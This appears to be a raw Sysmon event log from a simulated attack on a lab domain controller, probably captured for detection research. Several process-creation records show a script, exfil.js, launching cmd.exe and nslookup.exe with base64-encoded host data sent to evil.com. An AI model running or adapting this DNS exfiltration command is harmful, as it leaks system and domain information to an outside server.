10341000x8000000000000000212390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.707{2E1864BB-18F5-629A-0845-000000005F02}60324848C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0945-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.707{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.707{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.707{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.707{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.707{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0945-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.707{2E1864BB-18F5-629A-0745-000000005F02}6847576C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-0945-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.715{2E1864BB-18F5-629A-0945-000000005F02}8012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-0745-000000005F02}684C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrcjh.tmp 2>&1 354300x8000000000000000212382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.264{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50991- 354300x8000000000000000212381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.264{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50990- 354300x8000000000000000212380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.263{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50989- 354300x8000000000000000212379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.182{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-50988-false127.0.0.1-53domain 354300x8000000000000000212378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.182{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50988- 354300x8000000000000000212377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.182{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-50988-false127.0.0.1-53domain 354300x8000000000000000212376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.110{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50987-false127.0.0.1-53domain 354300x8000000000000000212375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.110{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50987- 354300x8000000000000000212374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.110{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50987-false127.0.0.1-53domain 354300x8000000000000000212373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.110{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50986-false127.0.0.1-53domain 354300x8000000000000000212372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50986- 354300x8000000000000000212371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.109{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50986-false127.0.0.1-53domain 354300x8000000000000000212370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.109{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50985-false127.0.0.1-53domain 354300x8000000000000000212369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50985- 354300x8000000000000000212368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.109{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50985-false127.0.0.1-53domain 354300x8000000000000000212367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.376{00000000-0000-0000-0000-000000000000}300<unknown process>-udpfalsefalse127.0.0.1-50966-false127.0.0.1-53domain 354300x8000000000000000212366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.376{00000000-0000-0000-0000-000000000000}300<unknown process>-udptruefalse127.0.0.1-50966-false127.0.0.1-53domain 354300x8000000000000000212365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.376{00000000-0000-0000-0000-000000000000}300<unknown process>-udpfalsefalse127.0.0.1-50965-false127.0.0.1-53domain 354300x8000000000000000212364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.375{00000000-0000-0000-0000-000000000000}300<unknown process>-udptruefalse127.0.0.1-50965-false127.0.0.1-53domain 354300x8000000000000000212363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.375{00000000-0000-0000-0000-000000000000}300<unknown process>-udpfalsefalse127.0.0.1-50964-false127.0.0.1-53domain 354300x8000000000000000212362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.375{00000000-0000-0000-0000-000000000000}300<unknown process>-udptruefalse127.0.0.1-50964-false127.0.0.1-53domain 10341000x8000000000000000212361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.691{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0845-000000005F02}6032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.691{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0845-000000005F02}6032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.691{2E1864BB-18F5-629A-0845-000000005F02}60324848C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0745-000000005F02}684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.687{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0845-000000005F02}6032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.669{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.669{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.669{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.669{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.669{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0745-000000005F02}684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.669{2E1864BB-18E0-629A-6742-000000005F02}39765992C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-0745-000000005F02}684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.681{2E1864BB-18F5-629A-0745-000000005F02}684C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrcjh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.669{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcantz.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.653{2E1864BB-18F5-629A-0545-000000005F02}35526716C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0645-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 